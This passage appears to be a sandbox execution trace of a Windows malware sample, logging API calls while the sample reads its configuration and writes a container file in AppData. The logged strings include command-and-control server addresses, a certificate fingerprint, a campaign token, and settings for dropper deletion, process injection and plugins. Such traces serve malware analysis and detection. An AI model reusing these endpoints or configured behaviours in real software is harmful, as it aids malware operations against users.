0x3 [0043.546] strlen (_Str="core.gh.fp") returned 0xa [0043.546] strlen (_Str="8EEA9100E2BB0C318840F3C0ABC8AA26408B5F1C") returned 0x28 [0043.546] strlen (_Str="core.gh.i") returned 0x9 [0043.546] strlen (_Str="core.gh.i") returned 0x9 [0043.546] strlen (_Str="10") returned 0x2 [0043.546] strlen (_Str="core.delay") returned 0xa [0043.546] strlen (_Str="core.delay") returned 0xa [0043.546] strlen (_Str="core.delay") returned 0xa [0043.546] strlen (_Str="0") returned 0x1 [0043.546] strlen (_Str="core.servers") returned 0xc [0043.546] strlen (_Str="core.servers") returned 0xc [0043.546] strlen (_Str="core.servers") returned 0xc [0043.546] strlen (_Str="core.servers") returned 0xc [0043.546] strlen (_Str="192.99.181.10:443;checkbox.bit:443") returned 0x22 [0043.546] strlen (_Str="core.cert_fp") returned 0xc [0043.546] strlen (_Str="core.cert_fp") returned 0xc [0043.546] strlen (_Str="core.cert_fp") returned 0xc [0043.546] strlen (_Str="core.cert_fp") returned 0xc [0043.546] strlen (_Str="core.cert_fp") returned 0xc [0043.546] strlen (_Str="10E2870CB1534A758F2E299DBBED80316D400509") returned 0x28 [0043.546] strlen (_Str="core.delete_dropper") returned 0x13 [0043.546] strlen (_Str="core.delete_dropper") returned 0x13 [0043.546] strlen (_Str="core.delete_dropper") returned 0x13 [0043.546] strlen (_Str="core.delete_dropper") returned 0x13 [0043.547] strlen (_Str="core.delete_dropper") returned 0x13 [0043.547] strlen (_Str="core.delete_dropper") returned 0x13 [0043.547] strlen (_Str="1") returned 0x1 [0043.547] strlen (_Str="core.token") returned 0xa [0043.547] strlen (_Str="core.token") returned 0xa [0043.547] strlen (_Str="core.token") returned 0xa [0043.547] strlen (_Str="core.token") returned 0xa [0043.547] strlen (_Str="core.token") returned 0xa [0043.547] strlen (_Str="core.token") returned 0xa [0043.547] strlen (_Str="core.token") returned 0xa [0043.547] strlen (_Str="964ae920-c3b8-11e7-bfa9-d5c54519540f") returned 0x24 [0043.547] strlen (_Str="core.build_time") returned 0xf [0043.547] strlen (_Str="core.build_time") returned 0xf [0043.547] strlen (_Str="core.build_time") returned 0xf [0043.547] strlen (_Str="core.build_time") returned 0xf [0043.547] strlen (_Str="core.build_time") returned 0xf [0043.547] strlen (_Str="core.build_time") returned 0xf [0043.547] strlen (_Str="core.build_time") returned 0xf [0043.547] strlen (_Str="core.build_time") returned 0xf [0043.547] strlen (_Str="1510058337") returned 0xa [0043.548] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\454ae93e901dbdaa6732f2a7c8a0c95fc3e0c1b4\\container.dat.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\454ae93e901dbdaa6732f2a7c8a0c95fc3e0c1b4\\container.dat.tmp"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0043.549] WriteFile (in: hFile=0x1d8, lpBuffer=0x26012b0*, nNumberOfBytesToWrite=0x150, lpNumberOfBytesWritten=0x18a8ec, lpOverlapped=0x0 | out: lpBuffer=0x26012b0*, lpNumberOfBytesWritten=0x18a8ec*=0x150, lpOverlapped=0x0) returned 1 [0043.549] FlushFileBuffers (hFile=0x1d8) returned 1 [0043.551] CloseHandle (hObject=0x1d8) returned 1 [0043.552] CopyFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\454ae93e901dbdaa6732f2a7c8a0c95fc3e0c1b4\\container.dat.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\454ae93e901dbdaa6732f2a7c8a0c95fc3e0c1b4\\container.dat.tmp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\454ae93e901dbdaa6732f2a7c8a0c95fc3e0c1b4\\container.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\454ae93e901dbdaa6732f2a7c8a0c95fc3e0c1b4\\container.dat"), bFailIfExists=0) returned 1 [0043.553] strlen (_Str="core.guid") returned 0x9 [0043.554] strlen (_Str="core.guid") returned 0x9 [0043.554] strlen (_Str="core.guid") returned 0x9 [0043.554] strlen (_Str="core.guid") returned 0x9 [0043.554] strlen (_Str="core.guid") returned 0x9 [0043.554] strlen (_Str="core.guid") returned 0x9 [0043.554] strlen (_Str="core.guid") returned 0x9 [0043.554] strlen (_Str="core.guid") returned 0x9 [0043.554] CoCreateGuid (in: pguid=0x18a930 | out: pguid=0x18a930*(Data1=0x12fdeac4, Data2=0xeddc, Data3=0x49c0, Data4=([0]=0xa7, [1]=0x8a, [2]=0xb3, [3]=0x5c, [4]=0x74, [5]=0x75, [6]=0xad, [7]=0xbb))) returned 0x0 [0043.554] _snprintf (in: _Dest=0x18a880, _Count=0x78, _Format="%08x-%04x-%04x-%02x%02x-%02x%02x%02x%02x%02x%02x" | out: _Dest="12fdeac4-eddc-49c0-a78a-b35c7475adbb") returned 36 [0043.554] strlen (_Str="12fdeac4-eddc-49c0-a78a-b35c7475adbb") returned 0x24 [0043.554] strlen (_Str="core.guid") returned 0x9 [0043.554] strlen (_Str="core.guid") returned 0x9 [0043.554] strlen (_Str="core.guid") returned 0x9 [0043.554] strlen (_Str="core.guid") returned 0x9 [0043.554] strlen (_Str="core.guid") returned 0x9 [0043.554] strlen (_Str="core.guid") returned 0x9 [0043.554] strlen (_Str="core.guid") returned 0x9 [0043.554] strlen (_Str="core.guid") returned 0x9 [0043.554] strlen (_Str="core.guid") returned 0x9 [0043.554] strlen (_Str="12fdeac4-eddc-49c0-a78a-b35c7475adbb") returned 0x24 [0043.555] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\454ae93e901dbdaa6732f2a7c8a0c95fc3e0c1b4\\container.dat.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\454ae93e901dbdaa6732f2a7c8a0c95fc3e0c1b4\\container.dat.tmp"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0043.556] WriteFile (in: hFile=0x1d4, lpBuffer=0x26012e0*, nNumberOfBytesToWrite=0x180, lpNumberOfBytesWritten=0x18a93c, lpOverlapped=0x0 | out: lpBuffer=0x26012e0*, lpNumberOfBytesWritten=0x18a93c*=0x180, lpOverlapped=0x0) returned 1 [0043.556] FlushFileBuffers (hFile=0x1d4) returned 1 [0043.558] CloseHandle (hObject=0x1d4) returned 1 [0043.559] CopyFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\454ae93e901dbdaa6732f2a7c8a0c95fc3e0c1b4\\container.dat.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\454ae93e901dbdaa6732f2a7c8a0c95fc3e0c1b4\\container.dat.tmp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\454ae93e901dbdaa6732f2a7c8a0c95fc3e0c1b4\\container.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\454ae93e901dbdaa6732f2a7c8a0c95fc3e0c1b4\\container.dat"), bFailIfExists=0) returned 1 [0043.560] strlen (_Str="tmp.delete_file") returned 0xf [0043.560] strlen (_Str="tmp.delete_file") returned 0xf [0043.560] strlen (_Str="tmp.delete_file") returned 0xf [0043.560] strlen (_Str="tmp.delete_file") returned 0xf [0043.560] strlen (_Str="tmp.delete_file") returned 0xf [0043.560] strlen (_Str="tmp.delete_file") returned 0xf [0043.560] strlen (_Str="tmp.delete_file") returned 0xf [0043.560] strlen (_Str="tmp.delete_file") returned 0xf [0043.560] strlen (_Str="tmp.delete_file") returned 0xf [0043.560] strlen (_Str="core.delete_dropper") returned 0x13 [0043.560] strlen (_Str="core.delete_dropper") returned 0x13 [0043.560] strlen (_Str="core.delete_dropper") returned 0x13 [0043.560] strlen (_Str="core.delete_dropper") returned 0x13 [0043.560] strlen (_Str="core.delete_dropper") returned 0x13 [0043.561] strlen (_Str="core.delete_dropper") returned 0x13 [0043.561] atol (_Str="1") returned 1 [0043.561] strlen (_Str="core.delete_dropper") returned 0x13 [0043.562] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\454ae93e901dbdaa6732f2a7c8a0c95fc3e0c1b4\\container.dat.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\454ae93e901dbdaa6732f2a7c8a0c95fc3e0c1b4\\container.dat.tmp"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0043.562] WriteFile (in: hFile=0x1d8, lpBuffer=0x26012c8*, nNumberOfBytesToWrite=0x170, lpNumberOfBytesWritten=0x18a938, lpOverlapped=0x0 | out: lpBuffer=0x26012c8*, lpNumberOfBytesWritten=0x18a938*=0x170, lpOverlapped=0x0) returned 1 [0043.563] FlushFileBuffers (hFile=0x1d8) returned 1 [0043.564] CloseHandle (hObject=0x1d8) returned 1 [0043.565] CopyFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\454ae93e901dbdaa6732f2a7c8a0c95fc3e0c1b4\\container.dat.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\454ae93e901dbdaa6732f2a7c8a0c95fc3e0c1b4\\container.dat.tmp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\454ae93e901dbdaa6732f2a7c8a0c95fc3e0c1b4\\container.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\454ae93e901dbdaa6732f2a7c8a0c95fc3e0c1b4\\container.dat"), bFailIfExists=0) returned 1 [0043.566] strlen (_Str="dropper.path") returned 0xc [0043.566] strlen (_Str="dropper.path") returned 0xc [0043.566] strlen (_Str="dropper.path") returned 0xc [0043.566] strlen (_Str="dropper.path") returned 0xc [0043.566] strlen (_Str="dropper.path") returned 0xc [0043.566] strlen (_Str="dropper.path") returned 0xc [0043.566] strlen (_Str="dropper.path") returned 0xc [0043.567] strlen (_Str="dropper.path") returned 0xc [0043.567] wcslen (_String="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\pST790mv.exe") returned 0x3d [0043.567] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\pST790mv.exe", cchWideChar=61, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0043.567] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\pST790mv.exe", cchWideChar=61, lpMultiByteStr=0x2600bb8, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\pST790mv.exe", lpUsedDefaultChar=0x0) returned 61 [0043.567] strlen (_Str="dropper.path") returned 0xc [0043.567] strlen (_Str="dropper.path") returned 0xc [0043.567] strlen (_Str="dropper.path") returned 0xc [0043.567] strlen (_Str="dropper.path") returned 0xc [0043.567] strlen (_Str="dropper.path") returned 0xc [0043.567] strlen (_Str="dropper.path") returned 0xc [0043.567] strlen (_Str="dropper.path") returned 0xc [0043.567] strlen (_Str="dropper.path") returned 0xc [0043.567] strlen (_Str="dropper.path") returned 0xc [0043.567] strlen (_Str="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\pST790mv.exe") returned 0x3d [0043.568] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\454ae93e901dbdaa6732f2a7c8a0c95fc3e0c1b4\\container.dat.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\454ae93e901dbdaa6732f2a7c8a0c95fc3e0c1b4\\container.dat.tmp"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0043.569] WriteFile (in: hFile=0x1d4, lpBuffer=0x2601318*, nNumberOfBytesToWrite=0x1c0, lpNumberOfBytesWritten=0x18a938, lpOverlapped=0x0 | out: lpBuffer=0x2601318*, lpNumberOfBytesWritten=0x18a938*=0x1c0, lpOverlapped=0x0) returned 1 [0043.569] FlushFileBuffers (hFile=0x1d4) returned 1 [0043.571] CloseHandle (hObject=0x1d4) returned 1 [0043.572] CopyFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\454ae93e901dbdaa6732f2a7c8a0c95fc3e0c1b4\\container.dat.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\454ae93e901dbdaa6732f2a7c8a0c95fc3e0c1b4\\container.dat.tmp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\454ae93e901dbdaa6732f2a7c8a0c95fc3e0c1b4\\container.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\454ae93e901dbdaa6732f2a7c8a0c95fc3e0c1b4\\container.dat"), bFailIfExists=0) returned 1 [0043.573] strlen (_Str="core.inject") returned 0xb [0043.573] strlen (_Str="core.inject") returned 0xb [0043.573] strlen (_Str="core.inject") returned 0xb [0043.573] strlen (_Str="core.inject") returned 0xb [0043.573] strlen (_Str="core.inject") returned 0xb [0043.573] strlen (_Str="core.inject") returned 0xb [0043.573] strlen (_Str="core.inject") returned 0xb [0043.573] strlen (_Str="core.inject") returned 0xb [0043.573] strlen (_Str="core.inject") returned 0xb [0043.574] VerSetConditionMask (ConditionMask=0x0, TypeMask=0x0, Condition=0x2) returned 0x18 [0043.574] VerSetConditionMask (ConditionMask=0x18, TypeMask=0x80000000, Condition=0x1) returned 0x1b [0043.574] VerifyVersionInfoA (in: lpVersionInformation=0x18a8c4, dwTypeMask=0x3, dwlConditionMask=0x1b | out: lpVersionInformation=0x18a8c4) returned 1 [0043.574] GetCurrentProcess () returned 0xffffffff [0043.574] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x18, TokenHandle=0x18a954 | out: TokenHandle=0x18a954*=0x1d8) returned 1 [0043.574] GetTokenInformation (in: TokenHandle=0x1d8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x18a950 | out: TokenInformation=0x0, ReturnLength=0x18a950) returned 0 [0043.574] GetLastError () returned 0x7a [0043.574] GetTokenInformation (in: TokenHandle=0x1d8, TokenInformationClass=0x19, TokenInformation=0x2601170, TokenInformationLength=0x14, ReturnLength=0x18a950 | out: TokenInformation=0x2601170, ReturnLength=0x18a950) returned 1 [0043.574] GetSidSubAuthorityCount (pSid=0x2601178*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x3000)) returned 0x2601179 [0043.574] GetSidSubAuthority (pSid=0x2601178*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x3000), nSubAuthority=0x0) returned 0x2601180 [0043.574] strlen (_Str="core.delay") returned 0xa [0043.574] strlen (_Str="core.delay") returned 0xa [0043.574] strlen (_Str="core.delay") returned 0xa [0043.574] atol (_Str="0") returned 0 [0043.574] strlen (_Str="dropper.path") returned 0xc [0043.574] strlen (_Str="dropper.path") returned 0xc [0043.574] strlen (_Str="dropper.path") returned 0xc [0043.574] strlen (_Str="dropper.path") returned 0xc [0043.574] strlen (_Str="dropper.path") returned 0xc [0043.574] strlen (_Str="dropper.path") returned 0xc [0043.574] strlen (_Str="dropper.path") returned 0xc [0043.574] strlen (_Str="dropper.path") returned 0xc [0043.574] strlen (_Str="dropper.path") returned 0xc [0043.574] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x2600c00, cbMultiByte=61, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 61 [0043.574] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x2600c00, cbMultiByte=61, lpWideCharStr=0x2df38, cchWideChar=61 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\pST790mv.exe") returned 61 [0043.574] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x1d8 [0043.574] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4dd58fc, lpParameter=0x2600088, dwCreationFlags=0x0, lpThreadId=0x2600090 | out: lpThreadId=0x2600090*=0xabc) returned 0x1d4 [0043.575] GdiplusStartup (in: token=0x4e3c074, input=0x18a970, output=0x0 | out: token=0x4e3c074, output=0x0) returned 0x1 [0043.580] LoadLibraryA (lpLibFileName="user32.dll") returned 0x74ca0000 [0043.580] GetProcAddress (hModule=0x74ca0000, lpProcName="SetProcessDpiAwarenessContext") returned 0x0 [0043.580] GetProcAddress (hModule=0x74ca0000, lpProcName="SetProcessDpiAwareness") returned 0x0 [0043.580] GetProcAddress (hModule=0x74ca0000, lpProcName="SetProcessDPIAware") returned 0x74cbfcb8 [0043.580] SetProcessDPIAware () returned 1 [0043.580] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x1dc [0043.580] strlen (_Str="core.restart_cmd") returned 0x10 [0043.580] strlen (_Str="core.restart_cmd") returned 0x10 [0043.581] strlen (_Str="core.restart_cmd") returned 0x10 [0043.581] strlen (_Str="core.restart_cmd") returned 0x10 [0043.581] strlen (_Str="core.restart_cmd") returned 0x10 [0043.581] strlen (_Str="core.restart_cmd") returned 0x10 [0043.581] strlen (_Str="core.restart_cmd") returned 0x10 [0043.581] strlen (_Str="core.restart_cmd") returned 0x10 [0043.581] strlen (_Str="core.restart_cmd") returned 0x10 [0043.581] strlen (_Str="core.installed_file") returned 0x13 [0043.581] strlen (_Str="core.installed_file") returned 0x13 [0043.581] strlen (_Str="core.installed_file") returned 0x13 [0043.581] strlen (_Str="core.installed_file") returned 0x13 [0043.581] strlen (_Str="core.installed_file") returned 0x13 [0043.581] strlen (_Str="core.installed_file") returned 0x13 [0043.581] strlen (_Str="core.installed_file") returned 0x13 [0043.581] strlen (_Str="core.installed_file") returned 0x13 [0043.581] strlen (_Str="core.installed_file") returned 0x13 [0043.581] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x18a548, nSize=0x207 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\pST790mv.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\pst790mv.exe")) returned 0x3d [0043.581] wcslen (_String="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\pST790mv.exe") returned 0x3d [0043.581] wcslen (_String="crash_flag") returned 0xa [0043.581] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\454ae93e901dbdaa6732f2a7c8a0c95fc3e0c1b4\\crash_flag" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\454ae93e901dbdaa6732f2a7c8a0c95fc3e0c1b4\\crash_flag")) returned 0xffffffff [0043.581] strlen (_Str="core.crash_handler") returned 0x12 [0043.581] strlen (_Str="core.crash_handler") returned 0x12 [0043.581] strlen (_Str="core.crash_handler") returned 0x12 [0043.581] strlen (_Str="core.crash_handler") returned 0x12 [0043.581] strlen (_Str="core.crash_handler") returned 0x12 [0043.581] strlen (_Str="core.crash_handler") returned 0x12 [0043.581] strlen (_Str="core.crash_handler") returned 0x12 [0043.581] strlen (_Str="core.crash_handler") returned 0x12 [0043.581] strlen (_Str="core.crash_handler") returned 0x12 [0043.582] CreateIoCompletionPort (FileHandle=0xffffffff, ExistingCompletionPort=0x0, CompletionKey=0x0, NumberOfConcurrentThreads=0x1) returned 0x1e0 [0043.582] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4de9850, lpParameter=0x2600c48, dwCreationFlags=0x0, lpThreadId=0x2600c74 | out: lpThreadId=0x2600c74*=0xac0) returned 0x1e4 [0043.582] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x1e8 [0043.582] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x1ec [0043.582] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x1f0 [0043.582] strlen (_Str="core.cert_fp") returned 0xc [0043.582] strlen (_Str="core.cert_fp") returned 0xc [0043.582] strlen (_Str="core.cert_fp") returned 0xc [0043.582] strlen (_Str="core.cert_fp") returned 0xc [0043.582] strlen (_Str="core.cert_fp") returned 0xc [0043.582] strlen (_Str="10E2870CB1534A758F2E299DBBED80316D400509") returned 0x28 [0043.582] strlen (_Str="core.servers") returned 0xc [0043.582] strlen (_Str="core.servers") returned 0xc [0043.582] strlen (_Str="core.servers") returned 0xc [0043.582] strlen (_Str="core.servers") returned 0xc [0043.582] strlen (_Str=";") returned 0x1 [0043.583] strlen (_Str=";") returned 0x1 [0043.583] strlen (_Str=";") returned 0x1 [0043.583] GetCurrentThreadId () returned 0xaac [0043.583] GetCurrentThreadId () returned 0xaac [0043.583] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x1f4 [0043.583] PostQueuedCompletionStatus (CompletionPort=0x1e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2603d5c) returned 1 [0043.583] WaitForSingleObject (hHandle=0x1f4, dwMilliseconds=0x7530) returned 0x0 [0043.584] CloseHandle (hObject=0x1f4) returned 1 [0043.584] strlen (_Str="core.server") returned 0xb [0043.584] strlen (_Str="core.server") returned 0xb [0043.584] strlen (_Str="core.server") returned 0xb [0043.584] strlen (_Str="core.server") returned 0xb [0043.584] strlen (_Str="core.server") returned 0xb [0043.584] strlen (_Str="core.server") returned 0xb [0043.584] strlen (_Str="core.server") returned 0xb [0043.584] strlen (_Str="core.server") returned 0xb [0043.584] strlen (_Str="core.server") returned 0xb [0043.585] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x1f4 [0043.585] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x1f8 [0043.585] strlen (_Str="core.plugins_key") returned 0x10 [0043.585] strlen (_Str="core.plugins_key") returned 0x10 [0043.585] strlen (_Str="core.plugins_key") returned 0x10 [0043.585] strlen (_Str="core.plugins_key") returned 0x10 [0043.585] strlen (_Str="core.plugins_key") returned 0x10 [0043.585] strlen (_Str="core.plugins_key") returned 0x10 [0043.585] strlen (_Str="core.plugins_key") returned 0x10 [0043.585] strlen (_Str="core.plugins_key") returned 0x10 [0043.585] strlen (_Str="core.plugins_key") returned 0x10 [0043.585] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x1cda3193 [0043.585] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0xf9c55b1 [0043.585] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x6e9ebcd0 [0043.585] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x62389c1d [0043.585] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x71e15149 [0043.585] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x17d322e6 [0043.585] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x7dd16763 [0043.585] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x22cdb7b4 [0043.585] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x2b1e143c [0043.585] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x5e4ef4cd [0043.585] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0xfd51638 [0043.585] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x5fc894f0 [0043.585] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x36b0b60b [0043.585] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x673514d2 [0043.585] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x42ec5524 [0043.585] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x1a028a35 [0043.585] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x24575e4e [0043.585] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x76affaae [0043.585] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x193719cf [0043.585] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x25920c78 [0043.585] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x36b94960 [0043.586] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0xe6fc54 [0043.586] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x1abc2c4b [0043.586] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x462b3d83 [0043.586] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x307cfd67 [0043.586] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x11da0abb [0043.586] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x23eb16da [0043.586] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x4f45e03c [0043.586] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x45d699d9 [0043.586] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x1e4643fd [0043.586] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x6bff99a4 [0043.586] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x2aa64381 [0043.586] strlen (_Str="core.plugins_key") returned 0x10 [0043.586] strlen (_Str="core.plugins_key") returned 0x10 [0043.586] strlen (_Str="core.plugins_key") returned 0x10 [0043.586] strlen (_Str="core.plugins_key") returned 0x10 [0043.586] strlen (_Str="core.plugins_key") returned 0x10 [0043.586] strlen (_Str="core.plugins_key") returned 0x10 [0043.586] strlen (_Str="core.plugins_key") returned 0x10 [0043.586] strlen (_Str="core.plugins_key") returned 0x10 [0043.586] strlen (_Str="core.plugins_key") returned 0x10 [0043.586] strlen (_Str="core.plugins_key") returned 0x10 [0043.586] strlen (_Str="BBB29A54EDF31A5C996F33ADA883A8DB28CF393C99384E3212B100B18FA5A995") returned 0x40 [0043.586] strcmp (_Str1="core.plugins_key", _Str2="core.crash_handler") returned 1 [0043.586] strcmp (_Str1="core.plugins_key", _Str2="core.installed_file") returned 1 [0043.586] strcmp (_Str1="core.plugins_key", _Str2="core.restart_cmd") returned -1 [0043.586] strcmp (_Str1="core.plugins_key", _Str2="core.servers") returned -1 [0043.586] strcmp (_Str1="core.plugins_key", _Str2="core.cert_fp") returned 1 [0043.586] strlen (_Str="core.safe_mode") returned 0xe [0043.587] strlen (_Str="core.safe_mode") returned 0xe [0043.587] strlen (_Str="core.safe_mode") returned 0xe [0043.587] strlen (_Str="core.safe_mode") returned 0xe [0043.587] strlen (_Str="core.safe_mode") returned 0xe [0043.587] strlen (_Str="core.safe_mode") returned 0xe [0043.587] strlen (_Str="core.safe_mode") returned 0xe [0043.587] strlen (_Str="core.safe_mode") returned 0xe [0043.587] strlen (_Str="core.safe_mode") returned 0xe [0043.587] strlen (_Str="core.safe_mode") returned 0xe [0043.587] ResetEvent (hEvent=0x1f4) returned 1 [0043.587] strlen (_Str="core.plugins_dir") returned 0x10 [0043.587] strlen (_Str="core.plugins_dir") returned 0x10 [0043.587] strlen (_Str="core.plugins_dir") returned 0x10 [0043.587] strlen (_Str="core.plugins_dir") returned 0x10 [0043.587] strlen (_Str="core.plugins_dir") returned 0x10 [0043.587] strlen (_Str="core.plugins_dir") returned 0x10 [0043.587] strlen (_Str="core.plugins_dir") returned 0x10 [0043.587] strlen (_Str="core.plugins_dir") returned 0x10 [0043.587] strlen (_Str="core.plugins_dir") returned 0x10 [0043.587] strlen (_Str="core.plugins_dir") returned 0x10 [0043.587] CoCreateGuid (in: pguid=0x18a8c0 | out: pguid=0x18a8c0*(Data1=0x8054e6dc, Data2=0xe4db, Data3=0x4147, Data4=([0]=0x99, [1]=0x38, [2]=0xad, [3]=0xa2, [4]=0x6b, [5]=0xf0, 